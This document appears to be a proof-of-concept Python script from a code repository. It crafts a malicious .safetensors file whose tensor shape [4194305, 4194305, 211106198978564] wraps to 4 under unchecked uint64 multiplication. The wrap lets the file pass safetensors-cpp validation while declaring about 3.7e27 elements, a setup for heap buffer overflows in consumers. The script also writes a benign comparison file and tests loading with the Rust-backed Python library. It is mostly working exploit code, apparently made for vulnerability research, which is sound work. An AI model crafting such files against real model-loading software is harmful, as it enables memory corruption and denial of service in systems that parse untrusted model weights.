File size: 5,607 Bytes
4c19aea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
#!/usr/bin/env python3
"""
Craft a malicious .safetensors file that exploits integer overflow in safetensors-cpp.

The safetensors format:
  - 8 bytes: header_size as little-endian uint64
  - header_size bytes: JSON header
  - remaining bytes: tensor data

The JSON header maps tensor names to {dtype, shape, data_offsets: [start, end]}.

VULNERABILITY:
safetensors-cpp's get_shape_size() multiplies shape dimensions without overflow checking:
    size_t sz = 1;
    for (size_t i = 0; i < t.shape.size(); i++) {
        sz *= t.shape[i];   // NO checked_mul!
    }

The Rust reference implementation uses checked_mul and rejects overflow.

EXPLOIT:
Shape [4194305, 4194305, 211106198978564] has true product ~3.7e27
but overflows uint64 to exactly 4. With F32 (4 bytes/element),
tensor_size = 16 bytes. Validation passes because data_offsets = [0, 16].

A consumer that trusts the shape dimensions (e.g., to allocate a buffer for
reshaping/processing) would compute 4194305 * 4194305 * 211106198978564 * 4 bytes
= a colossal allocation, or if they also overflow, get a tiny buffer that they
then write ~3.7e27 * 4 bytes into -> heap buffer overflow.
"""

import json
import struct
import sys
import os


def craft_overflow_safetensors(output_path: str):
    """Write a safetensors file whose shape product wraps around in uint64.

    The file contains a single F32 tensor named ``overflow_tensor`` backed by
    16 bytes of data. Its declared shape multiplies out to roughly 3.7e27
    elements, but the product reduced modulo 2**64 is exactly 4, so a parser
    doing unchecked 64-bit multiplication sees 4 elements * 4 bytes = 16
    bytes and considers ``data_offsets == [0, 16]`` consistent.

    A summary of the header and of the true/wrapped sizes is printed to
    stdout after the file is written.

    Args:
        output_path: Destination path; the file is created or overwritten.

    Returns:
        ``output_path``, unchanged.
    """
    # 4194305 == 2**22 + 1. The third factor is chosen so that the full
    # product is congruent to 4 modulo 2**64. All three values are below
    # 2**53, so they survive a round-trip through a JSON double untouched.
    dims = [4194305, 4194305, 211106198978564]

    # Four wrapped elements of four bytes each: 16 bytes of 'A'.
    payload = b"\x41\x41\x41\x41" * 4
    data_size = 16

    descriptor = {
        "overflow_tensor": {
            "dtype": "F32",
            "shape": dims,
            "data_offsets": [0, data_size],
        }
    }

    # Compact separators, i.e. no whitespace inside the JSON document.
    header_json = json.dumps(descriptor, separators=(',', ':'))
    raw_header = header_json.encode('utf-8')

    # Space-pad the header up to the next multiple of eight bytes.
    padded_header = raw_header + b' ' * (-len(raw_header) % 8)
    header_size = len(padded_header)

    # Layout: little-endian uint64 header length, header, tensor bytes.
    blob = b"".join((struct.pack('<Q', header_size), padded_header, payload))

    with open(output_path, 'wb') as out:
        out.write(blob)

    # Python integers are arbitrary precision, so this is the real product;
    # the modulo reproduces what a wrapping 64-bit multiply would yield.
    true_count = dims[0] * dims[1] * dims[2]
    wrapped_count = true_count % (2**64)
    wrapped_bytes = wrapped_count * 4

    summary = (
        f"[+] Written malicious safetensors file: {output_path}",
        f"    Header size: {header_size} bytes",
        f"    Header JSON: {header_json}",
        f"    Total file size: {len(blob)} bytes",
        f"    Shape: {dims}",
        f"    True element count: {true_count}",
        f"    Overflowed element count (mod 2^64): {wrapped_count}",
        f"    Overflowed tensor_size (F32, 4 bytes): {wrapped_bytes}",
        f"    Actual data size: {data_size} bytes",
        f"    Validation tensor_size == data_size: {wrapped_bytes == data_size}",
    )
    for line in summary:
        print(line)

    return output_path


def craft_normal_safetensors(output_path: str):
    """Create a normal (benign) safetensors file for comparison.

    The file holds one F32 tensor named ``normal_tensor`` with shape
    ``[2, 2]`` and the values 1.0, 2.0, 3.0, 4.0 stored little-endian.
    A one-line summary is printed to stdout after the file is written.

    Args:
        output_path: Destination path; the file is created or overwritten.

    Returns:
        ``output_path``, unchanged, matching what
        ``craft_overflow_safetensors`` returns.
    """
    shape = [2, 2]
    tensor_data = struct.pack('<4f', 1.0, 2.0, 3.0, 4.0)
    # Derive the size from the payload itself (4 elements * 4 bytes = 16)
    # so the declared data_offsets can never drift from the bytes written.
    data_size = len(tensor_data)

    header = {
        "normal_tensor": {
            "dtype": "F32",
            "shape": shape,
            "data_offsets": [0, data_size]
        }
    }

    # Compact JSON, then space-pad to a multiple of eight bytes.
    header_json = json.dumps(header, separators=(',', ':'))
    header_bytes = header_json.encode('utf-8')
    header_bytes += b' ' * (-len(header_bytes) % 8)
    header_size = len(header_bytes)

    # Layout: little-endian uint64 header length, header, tensor bytes.
    file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data

    with open(output_path, 'wb') as f:
        f.write(file_data)

    print(f"[+] Written normal safetensors file: {output_path}")
    print(f"    Shape: {shape}, data_size: {data_size}")

    return output_path


def test_with_python_safetensors(filepath: str):
    """Try to load *filepath* with the Python ``safetensors`` package.

    Every tensor in the file is fetched through ``safe_open`` with the
    numpy framework, and the outcome is printed to stdout: the loaded
    tensors plus a success line, or a rejection line naming the exception.
    If the ``safetensors`` package cannot be imported, a notice is printed
    and the check is skipped.

    Args:
        filepath: Path of the safetensors file to load.
    """
    # Keep the import in its own minimal try so that only a missing
    # package is ever reported as "skipped".
    try:
        from safetensors import safe_open
    except ImportError:
        print("\n[!] Python safetensors not installed, skipping Rust backend test")
        return

    print("\n[*] Testing with Python safetensors (Rust backend)...")
    try:
        with safe_open(filepath, framework="numpy") as f:
            for key in f.keys():
                tensor = f.get_tensor(key)
                print(f"    Loaded tensor '{key}': shape={tensor.shape}, dtype={tensor.dtype}")
    except Exception as e:
        # Deliberately broad: for this differential check any failure to
        # load the file is reported as a rejection, with the exception type.
        print(f"    Result: REJECTED - {type(e).__name__}: {e}")
    else:
        # This helper runs on both the benign and the crafted file, so the
        # message has to make sense for either of them.
        print("    Result: LOADED SUCCESSFULLY (expected for a benign file, unexpected for the overflow file)")


def main():
    """Generate both sample files next to this script and run the load check.

    Writes ``overflow_tensor.safetensors`` and ``normal_tensor.safetensors``
    into the directory containing this file, then passes each of them to
    ``test_with_python_safetensors`` under a printed banner.
    """
    base_dir = os.path.dirname(os.path.abspath(__file__))

    # Craft the malicious file first, then a normal file for comparison.
    overflow_path = os.path.join(base_dir, "overflow_tensor.safetensors")
    craft_overflow_safetensors(overflow_path)

    normal_path = os.path.join(base_dir, "normal_tensor.safetensors")
    craft_normal_safetensors(normal_path)

    # Test with the Python/Rust implementation: benign file first so its
    # result serves as the baseline for the crafted one.
    print("\n" + "=" * 60)
    print("DIFFERENTIAL TEST: Python/Rust safetensors")
    print("=" * 60)
    for label, path in (
        ("\nNormal file:", normal_path),
        ("\nOverflow file:", overflow_path),
    ):
        print(label)
        test_with_python_safetensors(path)


if __name__ == "__main__":
    main()